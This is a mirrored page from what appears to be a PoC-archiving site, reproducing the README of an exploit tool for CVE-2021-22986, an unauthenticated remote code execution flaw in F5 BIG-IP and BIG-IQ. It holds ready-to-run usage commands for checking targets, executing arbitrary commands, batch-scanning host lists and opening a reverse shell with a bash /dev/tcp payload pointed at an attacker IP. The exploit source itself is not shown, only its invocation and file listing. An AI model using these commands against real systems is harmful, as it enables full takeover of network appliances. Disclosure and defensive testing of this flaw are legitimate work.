Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-22986 PoC — F5 BIG-IP 代码问题漏洞

Source
https://github.com/Al1ex/CVE-2021-22986
Associated Vulnerability
Title:F5 BIG-IP 代码问题漏洞 (CVE-2021-22986)
Description:F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。 F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过BIG-IP管理界面和自身IP地址对iControl REST接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。
Description
CVE-2021-22986 & F5 BIG-IP RCE
Readme
## Vuln Impact

This vulnerability allows for unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services. This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise. The BIG-IP system in Appliance mode is also vulnerable.

## Vuln Product

- F5 BIG-IQ 6.0.0-6.1.0
- F5 BIG-IQ 7.0.0-7.0.0.1
- F5 BIG-IQ 7.1.0-7.1.0.2
- F5 BIG-IP 12.1.0-12.1.5.2
- F5 BIG-IP 13.1.0-13.1.3.5
- F5 BIG-IP 14.1.0-14.1.3.1
- F5 BIG-IP 15.1.0-15.1.2
- F5 BIG-IP 16.0.0-16.0.1

## Vunl Check

**Basic usage**

```
python3 CVE_2021_22986.py
```

![use](img/use.png)

**Vuln check**

```
python3 CVE_2021_22986.py -v true -u https://192.168.174.164
```

![verify](img/verify.png)

**command execute:**

```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c id
```

![command_exec](img/exec.png)

```
python3 CVE_2021_22986.py -a true -u https://192.168.174.164 -c whoami
```

![exec_2](img/exec_2.png)

**batch scan**

```
python3 CVE_2021_22986.py -s true -f check.txt
```

![batch_scan](img/vul_scan.png)

**Reserve Shell**

```
python3 CVE_2021_22986.py -r true -u https://192.168.174.164 -c "bash -i >&/dev/tcp/192.168.174.129/8888 0>&1"
```

![reverse_shell](img/reverse_shell.png)

![reverse_shell_ok](img/reverse_shell_ok.png)


## New POC
```
python3 newpoc.py https://192.168.174.164
```
![newpoc](img/new_poc.png)

## Reference

https://support.f5.com/csp/article/K03009991

https://github.com/safesword/F5_RCE

https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986

https://github.com/Udyz/CVE-2021-22986-SSRF2RCE
File Snapshot

 [4.0K]  /data/pocs/8e408bff169342c8ff6c4d36b12aca2dd2e5bcf7
├── [5.8K]  CVE_2021_22986.py
├── [2.5M]  f5.rest.jar
├── [4.0K]  img
│   ├── [ 35K]  exec_2.png
│   ├── [ 35K]  exec.png
│   ├── [ 28K]  new_poc.png
│   ├── [292K]  reverse_shell_ok.png
│   ├── [ 34K]  reverse_shell.png
│   ├── [ 28K]  use.png
│   ├── [ 31K]  verify.png
│   └── [ 36K]  vul_scan.png
├── [3.6K]  newpoc.py
├── [1.9K]  README.md
└── [962K]  Technical Analysis_BIGIP_ATTKB.pdf

1 directory, 13 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.